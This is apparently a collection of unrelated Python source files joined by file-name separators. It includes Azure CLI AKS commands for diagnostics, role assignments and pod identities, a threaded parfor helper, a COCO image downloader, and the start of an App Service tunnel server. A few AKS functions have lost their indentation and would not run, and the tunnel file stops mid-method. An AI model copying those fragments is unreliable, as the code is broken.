        existing['current-context'] = addition['current-context']
    # check that ~/.kube/config is only read- and writable by its owner
    if platform.system() != 'Windows':
        existing_file_perms = "{:o}".format(stat.S_IMODE(os.lstat(existing_file).st_mode))
        if not existing_file_perms.endswith('600'):
            logger.warning('%s has permissions "%s".\nIt should be readable and writable only by its owner.',
                           existing_file, existing_file_perms)
    with open(existing_file, 'w+') as stream:
        yaml.safe_dump(existing, stream, default_flow_style=False)
    current_context = addition.get('current-context', 'UNKNOWN')
    msg = 'Merged "{}" as current context in {}'.format(current_context, existing_file)
    print(msg)
def cloud_storage_account_service_factory(cli_ctx, kwargs):
    """Build a CloudStorageAccount from credential entries in *kwargs*.

    Consumes (pops) 'account_name', 'account_key' and 'sas_token'; a
    'connection_string' entry is discarded if present.
    """
    from azure.cli.core.profiles import ResourceType, get_sdk
    t_cloud_storage_account = get_sdk(cli_ctx, ResourceType.DATA_STORAGE, 'common#CloudStorageAccount')
    name = kwargs.pop('account_name', None)
    key = kwargs.pop('account_key', None)
    sas = kwargs.pop('sas_token', None)
    kwargs.pop('connection_string', None)  # not consumed by this factory
    return t_cloud_storage_account(name, key, sas)
def get_storage_account_from_diag_settings(cli_ctx, resource_group_name, name):
    """Return the storage account ID from the first diagnostic setting of an
    AKS cluster, or None when the cluster has no diagnostic settings.
    """
    from azure.mgmt.monitor import MonitorManagementClient
    diag_client = get_mgmt_service_client(cli_ctx, MonitorManagementClient).diagnostic_settings
    subscription_id = get_subscription_id(cli_ctx)
    aks_resource_id = ('/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.ContainerService'
                       '/managedClusters/{2}').format(subscription_id, resource_group_name, name)
    settings = diag_client.list(aks_resource_id)
    if settings.value:
        return settings.value[0].storage_account_id
    print("No diag settings specified")
    return None
def display_diagnostics_report(temp_kubeconfig_path):   # pylint: disable=too-many-statements
    """Poll aks-periscope diagnostic results via kubectl and print them as tables.

    Lists Ready nodes, waits (up to 10 retries) for one ``apd`` resource per
    ready node, then reads each node's ``networkconfig`` / ``networkoutbound``
    status and prints both as tables. Raises CLIError when kubectl is missing
    or a kubectl invocation fails.
    """
    if not which('kubectl'):
        raise CLIError('Can not find kubectl executable in PATH')

    nodes = subprocess.check_output(
        ["kubectl", "--kubeconfig", temp_kubeconfig_path, "get", "node", "--no-headers"],
        universal_newlines=True)
    logger.debug(nodes)
    node_lines = nodes.splitlines()
    # Maps node name -> "diagnostics collected for this node" flag.
    ready_nodes = {}
    for node_line in node_lines:
        columns = node_line.split()
        logger.debug(node_line)
        if columns[1] != "Ready":
            logger.warning("Node %s is not Ready. Current state is: %s.", columns[0], columns[1])
        else:
            ready_nodes[columns[0]] = False

    logger.debug('There are %s ready nodes in the cluster', str(len(ready_nodes)))
    if not ready_nodes:
        logger.warning('No nodes are ready in the current cluster. Diagnostics info might not be available.')

    network_config_array = []
    network_status_array = []
    apds_created = False

    max_retry = 10
    for retry in range(0, max_retry):
        if not apds_created:
            # Phase 1: wait until an apd resource exists for every ready node.
            apd = subprocess.check_output(
                ["kubectl", "--kubeconfig", temp_kubeconfig_path, "get", "apd", "-n", "aks-periscope", "--no-headers"],
                universal_newlines=True
            )
            apd_lines = apd.splitlines()
            if apd_lines and 'No resources found' in apd_lines[0]:
                apd_lines.pop(0)
            # \r + end='' keeps the progress message on a single console line.
            print("Got {} diagnostic results for {} ready nodes{}\r".format(len(apd_lines),
                                                                            len(ready_nodes),
                                                                            '.' * retry), end='')
            if len(apd_lines) < len(ready_nodes):
                time.sleep(3)
            else:
                apds_created = True
                print()
        else:
            # Phase 2: collect results for nodes not yet processed.
            for node_name in ready_nodes:
                if ready_nodes[node_name]:
                    continue
                apdName = "aks-periscope-diagnostic-" + node_name
                try:
                    network_config = subprocess.check_output(
                        ["kubectl", "--kubeconfig", temp_kubeconfig_path,
                         "get", "apd", apdName, "-n",
                         "aks-periscope", "-o=jsonpath={.spec.networkconfig}"],
                        universal_newlines=True)
                    logger.debug('Dns status for node %s is %s', node_name, network_config)
                    network_status = subprocess.check_output(
                        ["kubectl", "--kubeconfig", temp_kubeconfig_path,
                         "get", "apd", apdName, "-n",
                         "aks-periscope", "-o=jsonpath={.spec.networkoutbound}"],
                        universal_newlines=True)
                    logger.debug('Network status for node %s is %s', node_name, network_status)
                    if not network_config or not network_status:
                        # Results not written yet; back off and retry the node loop.
                        print("The diagnostics information for node {} is not ready yet. "
                              "Will try again in 10 seconds.".format(node_name))
                        time.sleep(10)
                        break
                    # networkconfig is a bare JSON object; wrap in [] to parse as a list.
                    network_config_array += json.loads('[' + network_config + ']')
                    network_status_object = json.loads(network_status)
                    network_status_array += format_diag_status(network_status_object)
                    ready_nodes[node_name] = True
                except subprocess.CalledProcessError as err:
                    raise CLIError(err.output)

    print()
    if network_config_array:
        print("Below are the network configuration for each node: ")
        print()
        print(tabulate(network_config_array, headers="keys", tablefmt='simple'))
        print()
    else:
        logger.warning("Could not get network config. "
                       "Please run 'az aks kanalyze' command later to get the analysis results.")

    if network_status_array:
        print("Below are the network connectivity results for each node:")
        print()
        print(tabulate(network_status_array, headers="keys", tablefmt='simple'))
    else:
        logger.warning("Could not get networking status. "
                       "Please run 'az aks kanalyze' command later to get the analysis results.")
def format_diag_status(diag_status):
    """Colorize each entry's "Status" in place (red for errors, green otherwise) and return the list."""
    for entry in diag_status:
        status_text = entry["Status"]
        if not status_text:
            continue
        color = colorama.Fore.RED if "Error:" in status_text else colorama.Fore.GREEN
        entry["Status"] = f'{color}{status_text}{colorama.Style.RESET_ALL}'
    return diag_status
def format_bright(msg):
    """Return *msg* wrapped in bold/bright terminal escape codes (reset afterwards)."""
    return f'\033[1m{colorama.Style.BRIGHT}{msg}{colorama.Style.RESET_ALL}'
def format_hyperlink(the_link):
    """Return *the_link* styled bright blue so it stands out as a hyperlink in terminal output."""
    return f'\033[1m{colorama.Style.BRIGHT}{colorama.Fore.BLUE}{the_link}{colorama.Style.RESET_ALL}'
def get_aks_custom_headers(aks_custom_headers=None):
    """Parse a comma-separated "Key=Value" string into a headers dict.

    :param aks_custom_headers: e.g. "Key1=Value1,Key2=Value2"; None or "" yield {}.
    :return: dict mapping header names to values.
    :raises CLIError: when a pair contains no '='.
    """
    headers = {}
    if aks_custom_headers:
        for pair in aks_custom_headers.split(','):
            # partition (unlike split('=')) tolerates values that themselves
            # contain '=', e.g. base64-encoded header values.
            key, sep, value = pair.partition('=')
            if not sep:
                raise CLIError('custom headers format is incorrect')
            headers[key] = value
    return headers
def _put_managed_cluster_ensuring_permission(
        cmd,     # pylint: disable=too-many-locals,too-many-statements,too-many-branches
        client,
        subscription_id,
        resource_group_name,
        name,
        managed_cluster,
        monitoring_addon_enabled,
        ingress_appgw_addon_enabled,
        virtual_node_addon_enabled,
        need_grant_vnet_permission_to_cluster_identity,
        vnet_subnet_id,
        enable_managed_identity,
        attach_acr,
        headers,
        no_wait
):
    """Create/update the managed cluster, then perform addon role assignments.

    When any enabled addon needs a role assignment after creation, the PUT is
    awaited (ignoring no_wait) so the resulting cluster object can be used for
    the assignments; otherwise the PUT honors no_wait and returns immediately.
    Returns the cluster object (or the poller in the no-wait branch).
    """
    # some addons require post cluster creation role assignment
    need_post_creation_role_assignment = (monitoring_addon_enabled or
                                          ingress_appgw_addon_enabled or
                                          (enable_managed_identity and attach_acr) or
                                          virtual_node_addon_enabled or
                                          need_grant_vnet_permission_to_cluster_identity)
    if need_post_creation_role_assignment:
        # adding a wait here since we rely on the result for role assignment
        cluster = LongRunningOperation(cmd.cli_ctx)(client.create_or_update(
            resource_group_name=resource_group_name,
            resource_name=name,
            parameters=managed_cluster,
            custom_headers=headers))
        cloud_name = cmd.cli_ctx.cloud.name
        # add cluster spn/msi Monitoring Metrics Publisher role assignment to publish metrics to MDM
        # mdm metrics is supported only in azure public cloud, so add the role assignment only in this cloud
        if monitoring_addon_enabled and cloud_name.lower() == 'azurecloud':
            from msrestazure.tools import resource_id
            cluster_resource_id = resource_id(
                subscription=subscription_id,
                resource_group=resource_group_name,
                namespace='Microsoft.ContainerService', type='managedClusters',
                name=name
            )
            _add_monitoring_role_assignment(cluster, cluster_resource_id, cmd)
        if ingress_appgw_addon_enabled:
            _add_ingress_appgw_addon_role_assignment(cluster, cmd)
        if virtual_node_addon_enabled:
            _add_virtual_node_role_assignment(cmd, cluster, vnet_subnet_id)
        if need_grant_vnet_permission_to_cluster_identity:
            # Grant the cluster's own identity access to the pre-existing subnet.
            if not _create_role_assignment(cmd.cli_ctx, 'Network Contributor',
                                           cluster.identity.principal_id, scope=vnet_subnet_id,
                                           resolve_assignee=False):
                logger.warning('Could not create a role assignment for subnet. '
                               'Are you an Owner on this subscription?')
        if enable_managed_identity and attach_acr:
            # Attach ACR to cluster enabled managed identity
            if cluster.identity_profile is None or \
               cluster.identity_profile["kubeletidentity"] is None:
                # Creation succeeded but the kubelet identity is absent; ACR pull
                # permission must be granted manually.
                logger.warning('Your cluster is successfully created, but we failed to attach '
                               'acr to it, you can manually grant permission to the identity '
                               'named <ClUSTER_NAME>-agentpool in MC_ resource group to give '
                               'it permission to pull from ACR.')
            else:
                kubelet_identity_client_id = cluster.identity_profile["kubeletidentity"].client_id
                _ensure_aks_acr(cmd.cli_ctx,
                                client_id=kubelet_identity_client_id,
                                acr_name_or_id=attach_acr,
                                subscription_id=subscription_id)
    else:
        cluster = sdk_no_wait(no_wait, client.create_or_update,
                              resource_group_name=resource_group_name,
                              resource_name=name,
                              parameters=managed_cluster,
                              custom_headers=headers)

    return cluster
def _is_msi_cluster(managed_cluster):
return (managed_cluster and managed_cluster.identity and
(managed_cluster.identity.type.casefold() == "systemassigned" or managed_cluster.identity.type.casefold() == "userassigned"))
def _get_kubelet_config(file_path):
    """Load a kubelet configuration JSON file into a KubeletConfig object."""
    kubelet_config = get_file_json(file_path)
    if not isinstance(kubelet_config, dict):
        raise CLIError("Error reading kubelet configuration at {}. Please see https://aka.ms/CustomNodeConfig for correct format.".format(file_path))

    config_object = KubeletConfig()
    # Map the model's snake_case attributes onto the camelCase JSON keys.
    field_map = {
        "cpu_manager_policy": "cpuManagerPolicy",
        "cpu_cfs_quota": "cpuCfsQuota",
        "cpu_cfs_quota_period": "cpuCfsQuotaPeriod",
        "image_gc_high_threshold": "imageGcHighThreshold",
        "image_gc_low_threshold": "imageGcLowThreshold",
        "topology_manager_policy": "topologyManagerPolicy",
        "allowed_unsafe_sysctls": "allowedUnsafeSysctls",
        "fail_swap_on": "failSwapOn",
    }
    for attr, json_key in field_map.items():
        setattr(config_object, attr, kubelet_config.get(json_key, None))
    return config_object
def _get_linux_os_config(file_path):
    """Load a Linux OS configuration JSON file into a LinuxOSConfig object.

    :param file_path: path to the JSON file described at https://aka.ms/CustomNodeConfig.
    :return: populated LinuxOSConfig; unspecified fields are left as None.
    :raises CLIError: when the file is not a JSON object, or "sysctls" is
        present but not a JSON object.
    """
    os_config = get_file_json(file_path)
    if not isinstance(os_config, dict):
        raise CLIError("Error reading Linux OS configuration at {}. Please see https://aka.ms/CustomNodeConfig for correct format.".format(file_path))

    config_object = LinuxOSConfig()
    config_object.transparent_huge_page_enabled = os_config.get("transparentHugePageEnabled", None)
    config_object.transparent_huge_page_defrag = os_config.get("transparentHugePageDefrag", None)
    config_object.swap_file_size_mb = os_config.get("swapFileSizeMB", None)

    # sysctl settings are an optional section; previously a config without
    # "sysctls" was rejected outright, which contradicts its optional nature.
    sysctls = os_config.get("sysctls", None)
    if sysctls is None:
        return config_object
    if not isinstance(sysctls, dict):
        raise CLIError("Error reading Sysctl settings at {}. Please see https://aka.ms/CustomNodeConfig for correct format.".format(file_path))

    config_object.sysctls = SysctlConfig()
    # Map the model's snake_case attributes onto the camelCase JSON keys.
    sysctl_field_map = {
        "net_core_somaxconn": "netCoreSomaxconn",
        "net_core_netdev_max_backlog": "netCoreNetdevMaxBacklog",
        "net_core_rmem_max": "netCoreRmemMax",
        "net_core_wmem_max": "netCoreWmemMax",
        "net_core_optmem_max": "netCoreOptmemMax",
        "net_ipv4_tcp_max_syn_backlog": "netIpv4TcpMaxSynBacklog",
        "net_ipv4_tcp_max_tw_buckets": "netIpv4TcpMaxTwBuckets",
        "net_ipv4_tcp_fin_timeout": "netIpv4TcpFinTimeout",
        "net_ipv4_tcp_keepalive_time": "netIpv4TcpKeepaliveTime",
        "net_ipv4_tcp_keepalive_probes": "netIpv4TcpKeepaliveProbes",
        # NOTE: attribute name below matches the SDK model's spelling.
        "net_ipv4_tcpkeepalive_intvl": "netIpv4TcpkeepaliveIntvl",
        "net_ipv4_tcp_rmem": "netIpv4TcpRmem",
        "net_ipv4_tcp_wmem": "netIpv4TcpWmem",
        "net_ipv4_tcp_tw_reuse": "netIpv4TcpTwReuse",
        "net_ipv4_ip_local_port_range": "netIpv4IpLocalPortRange",
        "net_ipv4_neigh_default_gc_thresh1": "netIpv4NeighDefaultGcThresh1",
        "net_ipv4_neigh_default_gc_thresh2": "netIpv4NeighDefaultGcThresh2",
        "net_ipv4_neigh_default_gc_thresh3": "netIpv4NeighDefaultGcThresh3",
        "net_netfilter_nf_conntrack_max": "netNetfilterNfConntrackMax",
        "net_netfilter_nf_conntrack_buckets": "netNetfilterNfConntrackBuckets",
        "fs_inotify_max_user_watches": "fsInotifyMaxUserWatches",
        "fs_file_max": "fsFileMax",
        "fs_aio_max_nr": "fsAioMaxNr",
        "fs_nr_open": "fsNrOpen",
        "kernel_threads_max": "kernelThreadsMax",
        "vm_max_map_count": "vmMaxMapCount",
        "vm_swappiness": "vmSwappiness",
        "vm_vfs_cache_pressure": "vmVfsCachePressure",
    }
    for attr, json_key in sysctl_field_map.items():
        setattr(config_object.sysctls, attr, sysctls.get(json_key, None))
    return config_object
def _ensure_pod_identity_addon_is_enabled(instance):
addon_enabled = False
if instance and instance.pod_identity_profile:
addon_enabled = instance.pod_identity_profile.enabled
if not addon_enabled:
raise CLIError('The pod identity addon is not enabled for this managed cluster yet.\n'
'To enable, run "az aks update --enable-pod-identity')
def _update_addon_pod_identity(instance, enable, pod_identities=None, pod_identity_exceptions=None):
if not enable:
# when disable, null out the profile
instance.pod_identity_profile = None
return
if not instance.pod_identity_profile:
# not set before
instance.pod_identity_profile = ManagedClusterPodIdentityProfile(
enabled=True,
user_assigned_identities=pod_identities,
user_assigned_identity_exceptions=pod_identity_exceptions,
)
return
instance.pod_identity_profile.enabled = True
instance.pod_identity_profile.user_assigned_identities = pod_identities or []
instance.pod_identity_profile.user_assigned_identity_exceptions = pod_identity_exceptions or []
def _ensure_managed_identity_operator_permission(cli_ctx, instance, scope):
    """Ensure the cluster's identity has the Managed Identity Operator role on *scope*.

    Resolves the cluster's control-plane identity (first user-assigned identity,
    or the system-assigned principal), returns early if a matching assignment
    already exists at the exact scope, otherwise creates it and sleeps 30s for
    propagation. Raises CLIError on unsupported identity types or failures.
    """
    managed_identity_operator_role = 'Managed Identity Operator'
    # Built-in role definition id for "Managed Identity Operator".
    managed_identity_operator_role_id = 'f1a07417-d97a-45cb-824c-7a7467783830'

    cluster_identity_object_id = None
    if instance.identity.type.lower() == 'userassigned':
        # Take the principal of the first (arbitrary) user-assigned identity.
        for identity in instance.identity.user_assigned_identities.values():
            cluster_identity_object_id = identity.principal_id
            break
    elif instance.identity.type.lower() == 'systemassigned':
        cluster_identity_object_id = instance.identity.principal_id
    else:
        raise CLIError('unsupported identity type: {}'.format(instance.identity.type))
    if cluster_identity_object_id is None:
        raise CLIError('unable to resolve cluster identity')

    factory = get_auth_management_client(cli_ctx, scope)
    assignments_client = factory.role_assignments

    # Skip creation when an equivalent assignment already exists at this scope.
    for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
        if i.scope.lower() != scope.lower():
            continue
        if not i.role_definition_id.lower().endswith(managed_identity_operator_role_id):
            continue
        if i.principal_id.lower() != cluster_identity_object_id.lower():
            continue
        # already assigned
        return

    if not _add_role_assignment(cli_ctx, managed_identity_operator_role, cluster_identity_object_id,
                                is_service_principal=False, scope=scope):
        raise CLIError('Could not grant Managed Identity Operator permission for cluster')
    # need more time to propagate this assignment...
    print()
    print('Wait 30 seconds for identity role assignment propagation.')
    time.sleep(30)
def aks_pod_identity_add(cmd, client, resource_group_name, cluster_name,
                         identity_name, identity_namespace, identity_resource_id,
                         no_wait=False):  # pylint: disable=unused-argument
    """Add a pod identity (name/namespace bound to a user-assigned identity) to the cluster.

    Verifies the addon is enabled, grants the cluster identity the
    Managed Identity Operator role on the target identity, appends the new
    pod identity to the profile, and PUTs the updated cluster.
    """
    instance = client.get(resource_group_name, cluster_name)
    _ensure_pod_identity_addon_is_enabled(instance)

    user_assigned_identity = _get_user_assigned_identity(cmd.cli_ctx, identity_resource_id)
    _ensure_managed_identity_operator_permission(cmd.cli_ctx, instance, user_assigned_identity.id)

    pod_identities = []
    if instance.pod_identity_profile.user_assigned_identities:
        pod_identities = instance.pod_identity_profile.user_assigned_identities
    pod_identity = ManagedClusterPodIdentity(
        name=identity_name,
        namespace=identity_namespace,
        identity=UserAssignedIdentity(
            resource_id=user_assigned_identity.id,
            client_id=user_assigned_identity.client_id,
            object_id=user_assigned_identity.principal_id,
        )
    )
    pod_identities.append(pod_identity)

    _update_addon_pod_identity(
        instance, enable=True,
        pod_identities=pod_identities,
        pod_identity_exceptions=instance.pod_identity_profile.user_assigned_identity_exceptions,
    )

    # send the managed cluster representation to update the pod identity addon
    return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_delete(cmd, client, resource_group_name, cluster_name,
                            identity_name, identity_namespace,
                            no_wait=False):  # pylint: disable=unused-argument
    """Remove the pod identity matching name/namespace and update the cluster."""
    instance = client.get(resource_group_name, cluster_name)
    _ensure_pod_identity_addon_is_enabled(instance)

    remaining_identities = [
        identity for identity in (instance.pod_identity_profile.user_assigned_identities or [])
        if not (identity.name == identity_name and identity.namespace == identity_namespace)
    ]
    _update_addon_pod_identity(
        instance, enable=True,
        pod_identities=remaining_identities,
        pod_identity_exceptions=instance.pod_identity_profile.user_assigned_identity_exceptions,
    )

    # send the managed cluster representation to update the pod identity addon
    return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_list(cmd, client, resource_group_name, cluster_name):  # pylint: disable=unused-argument
    """Show the cluster's pod identity profile (cluster model with null fields stripped)."""
    cluster = client.get(resource_group_name, cluster_name)
    return _remove_nulls([cluster])[0]
def aks_pod_identity_exception_add(cmd, client, resource_group_name, cluster_name,
                                   exc_name, exc_namespace, pod_labels, no_wait=False):  # pylint: disable=unused-argument
    """Add a pod identity exception (pods matched by labels bypass NMI) and update the cluster."""
    instance = client.get(resource_group_name, cluster_name)
    _ensure_pod_identity_addon_is_enabled(instance)

    profile = instance.pod_identity_profile
    pod_identity_exceptions = profile.user_assigned_identity_exceptions or []
    pod_identity_exceptions.append(
        ManagedClusterPodIdentityException(name=exc_name, namespace=exc_namespace, pod_labels=pod_labels))

    _update_addon_pod_identity(
        instance, enable=True,
        pod_identities=profile.user_assigned_identities,
        pod_identity_exceptions=pod_identity_exceptions,
    )

    # send the managed cluster representation to update the pod identity addon
    return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_exception_delete(cmd, client, resource_group_name, cluster_name,
                                      exc_name, exc_namespace, no_wait=False):  # pylint: disable=unused-argument
    """Remove the pod identity exception matching name/namespace and update the cluster."""
    instance = client.get(resource_group_name, cluster_name)
    _ensure_pod_identity_addon_is_enabled(instance)

    remaining_exceptions = [
        exc for exc in (instance.pod_identity_profile.user_assigned_identity_exceptions or [])
        if not (exc.name == exc_name and exc.namespace == exc_namespace)
    ]
    _update_addon_pod_identity(
        instance, enable=True,
        pod_identities=instance.pod_identity_profile.user_assigned_identities,
        pod_identity_exceptions=remaining_exceptions,
    )

    # send the managed cluster representation to update the pod identity addon
    return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_exception_update(cmd, client, resource_group_name, cluster_name,
                                      exc_name, exc_namespace, pod_labels, no_wait=False):  # pylint: disable=unused-argument
    """Replace the pod labels of an existing pod identity exception and update the cluster."""
    instance = client.get(resource_group_name, cluster_name)
    _ensure_pod_identity_addon_is_enabled(instance)

    replacement = ManagedClusterPodIdentityException(name=exc_name, namespace=exc_namespace, pod_labels=pod_labels)
    found_target = False
    pod_identity_exceptions = []
    for exc in (instance.pod_identity_profile.user_assigned_identity_exceptions or []):
        if exc.name == exc_name and exc.namespace == exc_namespace:
            found_target = True
            pod_identity_exceptions.append(replacement)
        else:
            pod_identity_exceptions.append(exc)
    if not found_target:
        raise CLIError('pod identity exception {}/{} not found'.format(exc_namespace, exc_name))

    _update_addon_pod_identity(
        instance, enable=True,
        pod_identities=instance.pod_identity_profile.user_assigned_identities,
        pod_identity_exceptions=pod_identity_exceptions,
    )

    # send the managed cluster representation to update the pod identity addon
    return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_exception_list(cmd, client, resource_group_name, cluster_name):
    """Show pod identity exceptions (cluster model with null fields stripped)."""
    cluster = client.get(resource_group_name, cluster_name)
    return _remove_nulls([cluster])[0]
|
parfor.py | from typing import Any, Callable, List
import threading
def parfor(data_list: List[Any], func: Callable, num_workers: int, prog_bar: bool = True, **kwargs):
    """A parfor implementation.

    Args:
        data_list ([list]): a list storing all the data items to process
        func ([function]): a function taking (worker_id, data, **kwargs)
        num_workers ([int]): number of worker threads; 0 processes serially
            in the caller's thread
        prog_bar ([bool]): whether to show a tqdm progress bar
        kwargs: other args forwarded to func
    """
    index = 0
    lock = threading.Lock()
    bar = None
    if prog_bar:
        from tqdm import tqdm
        bar = tqdm(total=len(data_list))

    # Sentinel distinct from every possible list item, so that None values in
    # data_list are processed instead of silently terminating a worker early.
    _exhausted = object()

    def do_work(worker_id):
        nonlocal index
        while True:
            # Grab the next unprocessed item under the lock; the context
            # manager guarantees release even if bar.update() raises.
            with lock:
                if index < len(data_list):
                    data = data_list[index]
                    index += 1
                    if bar is not None:
                        bar.update()
                else:
                    data = _exhausted
            if data is _exhausted:
                break
            func(worker_id, data, **kwargs)

    if num_workers > 0:
        threads = [threading.Thread(target=do_work, args=(i,)) for i in range(num_workers)]
        for t in threads:
            t.start()
        for t in threads:
            t.join()
    else:
        # Degenerate case: run everything in the current thread, in order.
        do_work(0)

    if bar is not None:
        bar.close()
if __name__ == '__main__':
    # Smoke test: count how many items are processed across 10 workers.
    counter = [0]  # boxed in a list so the worker closure can mutate it
    lock = threading.Lock()

    def myfunc(worker_id, data, passwd):
        # `with lock` releases even on error; also avoids shadowing the
        # builtin `sum`, which the original did.
        with lock:
            counter[0] += 1

    parfor(list(range(1000000)), myfunc, 10, passwd=1)
    print(counter)
|
coco_download.py | from __future__ import print_function
from pycocotools.coco import COCO
import os
import zipfile
import shutil
import skimage.io as io
from PIL import Image
from threading import Thread, Lock
from urllib.error import URLError
from urllib.request import urlopen
# Choose main data dir and category from:
# person bicycle car motorcycle airplane bus train truck boat traffic light fire hydrant stop sign parking meter bench
# bird cat dog horse sheep cow elephant bear zebra giraffe backpack umbrella handbag tie suitcase frisbee skis snowboard
# sports ball kite baseball bat glove skateboard surfboard tennis racket bottle wine glass cup fork knife spoon
# bowl banana apple sandwich orange broccoli carrot hot dog pizza donut cake chair couch potted plant bed dining table
# toilet tv laptop mouse remote keyboard cell phone microwave oven toaster sink refrigerator book clock vase scissors
# teddy bear hair drier toothbrush
# User-tunable configuration ------------------------------------------------
data_dir = '../data/coco'      # root directory for the downloaded dataset
set_name = 'cat'               # subdirectory name for this image set
categories = ['cat']           # COCO category names to intersect (see list above)
download_count = 100000  # number of images to download
num_of_threads = 20            # worker threads used for downloading

# consts
DATA_TYPE = 'val2014'
# NOTE: the official archive is "annotations_train{val2014}.zip", i.e.
# "annotations_trainval2014.zip" — it contains both train and val annotations.
ANN_URL = 'http://images.cocodataset.org/annotations/annotations_train{}.zip'.format(DATA_TYPE)

# Setup paths
annDir = '%s/annotations' % data_dir                            # extracted annotation JSONs
annZipFile = '%s/annotations_%s.zip' % (data_dir, DATA_TYPE)    # downloaded archive path
annFile = '%s/instances_%s.json' % (annDir, DATA_TYPE)          # instance annotations in use
images_dir = '%s/%s' % (data_dir, set_name)                     # where images are saved
def download_json():
    """Download and unzip the COCO annotation archive unless already present."""
    if not os.path.exists(annDir):
        os.makedirs(annDir)
    if not os.path.exists(annFile):
        # Extracted JSON missing; fetch the zip first if we don't have it yet.
        if not os.path.exists(annZipFile):
            print("Downloading zipped annotations to " + annZipFile + " ...")
            resp = urlopen(ANN_URL)
            with open(annZipFile, 'wb') as out:
                shutil.copyfileobj(resp, out)
            print("... done downloading.")
            resp.close()
        print("Unzipping " + annZipFile)
        with zipfile.ZipFile(annZipFile, "r") as zip_ref:
            zip_ref.extractall(data_dir)
        print("... done unzipping")
    print("Will use annotations in " + annFile)
def download_setup():
    """Build the COCO handle and the de-duplicated list of image ids to download.

    Collects image ids per requested category, walks the per-category lists in
    parallel up to the length of the shortest one, and de-duplicates. Caps the
    global download_count at the number of ids found. Creates images_dir.
    """
    global download_count
    coco = COCO(annFile)
    img_cats = []
    img_ids = set()
    min_cat = download_count
    for category in categories:
        cat_ids = coco.getCatIds(catNms=[category])
        img_cats.append(coco.getImgIds(catIds=cat_ids))
        # Track the size of the smallest category's image list.
        if len(img_cats[-1]) < min_cat:
            min_cat = len(img_cats[-1])
    # Interleave ids across categories, skipping duplicates.
    for i in range(min_cat):
        for c in img_cats:
            if c[i] not in img_ids:
                img_ids.add(c[i])
    img_ids = list(img_ids)
    download_count = min(download_count, len(img_ids))
    if not os.path.exists(images_dir):
        os.makedirs(images_dir)
    return coco, img_ids
def download_thread(t, coco, img_ids):
    """Worker *t* downloads its contiguous slice of img_ids as numbered PNGs.

    Retries each image up to 3 times on URL errors and reports images that
    still failed. NOTE(review): the module-level `lock` is only created under
    `__main__`, so this function assumes the script is run directly — confirm
    before importing this module elsewhere.
    """
    thread_count = download_count // num_of_threads + 1
    start_count = t * thread_count
    end_count = min(start_count + thread_count, download_count)
    for i in range(start_count, end_count):
        file_name = '%s/%04d.png' % (images_dir, i + 1)
        if os.path.exists(file_name):
            continue
        for _attempt in range(3):
            try:
                # `with lock` guarantees release even if loadImgs raises;
                # the previous bare acquire/release could leave it held and
                # deadlock every other worker.
                with lock:
                    img_info = coco.loadImgs(img_ids[i])[0]
                img = io.imread(img_info['coco_url'])
                Image.fromarray(img).save(file_name, 'png')
                break
            except URLError:
                print('connection problem')
        else:
            # Previously exhausted retries were skipped silently.
            print('giving up on image %d after 3 failed attempts' % (i + 1))
    print('work done: thread %d' % t)
def download_main():
    """Fetch annotations, then download images with a pool of worker threads."""
    download_json()
    coco, img_ids = download_setup()
    workers = [Thread(target=download_thread, args=(t, coco, img_ids))
               for t in range(num_of_threads)]
    for worker in workers:
        worker.start()
    for worker in workers:
        worker.join()
    print('all done')
if __name__ == '__main__':
    # Shared lock used by download_thread to serialize pycocotools access.
    # NOTE(review): defined only when run as a script — importing this module
    # and calling download_thread directly would raise NameError on `lock`.
    lock = Lock()
    download_main()
|
tunnel.py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: disable=import-error,unused-import
import sys
import ssl
import json
import socket
import time
import traceback
import logging as logs
from contextlib import closing
from datetime import datetime
from threading import Thread
import websocket
from websocket import create_connection, WebSocket
from knack.util import CLIError
from knack.log import get_logger
logger = get_logger(__name__)
class TunnelWebSocket(WebSocket):
    """WebSocket subclass that logs every received frame/message at INFO level."""

    def recv_frame(self):
        # Delegate to the base implementation, then trace the raw frame.
        frame = super(TunnelWebSocket, self).recv_frame()
        logger.info('Received frame: %s', frame)
        return frame

    def recv(self):
        # Delegate to the base implementation, then trace the decoded payload.
        data = super(TunnelWebSocket, self).recv()
        logger.info('Received websocket data: %s', data)
        return data
# pylint: disable=no-member,too-many-instance-attributes,bare-except,no-self-use
class TunnelServer(object):
    """Local TCP server that forwards traffic to an App Service tunnel websocket.

    Listens on (local_addr, local_port); for each accepted connection it opens
    a websocket to the remote ``/AppServiceTunnel/Tunnel.ashx`` endpoint and
    pumps bytes in both directions using one thread per direction.
    """

    def __init__(self, local_addr, local_port, remote_addr, remote_user_name, remote_password):
        self.local_addr = local_addr
        self.local_port = local_port
        # local_port == 0 means "auto-select"; otherwise verify it is free.
        if self.local_port != 0 and not self.is_port_open():
            raise CLIError('Defined port is currently unavailable')
        if remote_addr.startswith("https://"):
            # Strip the scheme; the websocket URL is built with wss:// later.
            self.remote_addr = remote_addr[8:]
        else:
            self.remote_addr = remote_addr
        self.remote_user_name = remote_user_name
        self.remote_password = remote_password
        self.client = None   # most recent accepted client socket
        self.ws = None       # most recent websocket connection
        logger.info('Creating a socket on port: %s', self.local_port)
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        logger.info('Setting socket options')
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        logger.info('Binding to socket on local address and port')
        self.sock.bind((self.local_addr, self.local_port))
        if self.local_port == 0:
            self.local_port = self.sock.getsockname()[1]
            logger.info('Auto-selecting port: %s', self.local_port)
        logger.info('Finished initialization')

    def create_basic_auth(self):
        """Return the base64-encoded "user:password" value for the Authorization header."""
        from base64 import b64encode
        basic_auth_string = '{}:{}'.format(self.remote_user_name, self.remote_password).encode()
        basic_auth_string = b64encode(basic_auth_string).decode('utf-8')
        return basic_auth_string

    def is_port_open(self):
        """Return True when nothing currently accepts connections on self.local_port."""
        is_port_open = False
